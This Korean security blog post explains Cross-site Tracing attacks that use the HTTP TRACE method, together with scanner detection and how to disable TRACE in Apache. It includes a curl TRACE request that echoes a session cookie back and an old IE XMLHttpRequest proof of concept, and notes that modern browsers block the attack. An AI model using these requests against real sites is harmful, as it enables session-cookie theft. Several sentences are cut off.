홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 TRACE와 XST(Cross-site Tracing) 공격
웹 취약점 스캐너들이 TRACE 메소드는 XST에 취약하다고 쏟아낸다 (TRACE 메소드 수동점검 방법도 참조).
다음 예는 + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST [ ↑ Nikto의 HTTP TRACE method 탐지 사례 ]
웹 서버 설정에서 Apache의 TRACE 비활성화 방법- Apache 1.3.34 이상, Apache2 2.0.55 이상 TraceEnable off
아파치 웹서버 설정 파일인
TRACE를 이용한 XST(Cross-site Tracing) 공격 개요
2002년에 MS가 자사의 인터넷 익스플로러 6.0 SP1에
그런데 2003년에 root@kali:~# curl -v --cookie "PHPSESSID=dgklrb9cmv44lad6tbti706mv7" -X TRACE http://www.memozee.com/ * Trying 222.237.78.13... * Connected to www.memozee.com (222.237.78.13) port 80 (#0) > TRACE / HTTP/1.1 > Host: www.memozee.com > User-Agent: curl/7.47.0 > Accept: */* > Cookie: PHPSESSID=dgklrb9cmv44lad6tbti706mv7 > < HTTP/1.1 200 OK < Date: Fri, 11 Nov 2016 05:52:01 GMT < Server: Apache < Connection: close < Transfer-Encoding: chunked < Content-Type: message/http < TRACE / HTTP/1.1 Host: www.memozee.com User-Agent: curl/7.47.0 Accept: */* Cookie: PHPSESSID=dgklrb9cmv44lad6tbti706mv7 * Closing connection 0 root@kali:~#
위의 그림은 FireFox로 http://www.memozee.com/에 접속한 화면이다. 파이어폭스의 부가기능인 FireBug를
이용하여 쿠키를 살펴볼 수 있다.
그림에서 볼 수 있듯이
http://www.memozee.com/에 재접속하면서 OWASP-ZAP을 이용하여 <script type="text/javascript"> <!-- function sendTrace () { var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); xmlHttp.open("TRACE", "http://foo.bar",false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } //--> </script> <INPUT TYPE=BUTTON OnClick="sendTrace();" VALUE="Send Trace Request">
실제 공격이라면 위의 PoC에서 사용한
XST 공격 시나리오
공략가능성: 낮음현재 많이 사용하는 거의 모든 웹 브라우저는 XHR(XMLHttpRequest)에서 TRACE를 실행하지 못하도록 제한하고 있다. 이 때문에 Jeremiah Grossman이 보여주었던 AJAX를 이용한 TRACE 공략법은 현재 불가능한 것으로 알려져 있다. 다만, 플래쉬(Flash)와 같은 다른 플러그인(Plug-in)에서 XST 취약점을 공략할 수 있는 가능성은 남아있다. 참고할만한 바깥고리
[처음 작성한 날: 2016.11.11] [마지막으로 고친 날: 2016.11.11] < 이전 글 : HTTP 세션 탈취와 IP보안 (2016.11.11) > 다음 글 : 세션쿠키와 HttpOnly (2016.11.10) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |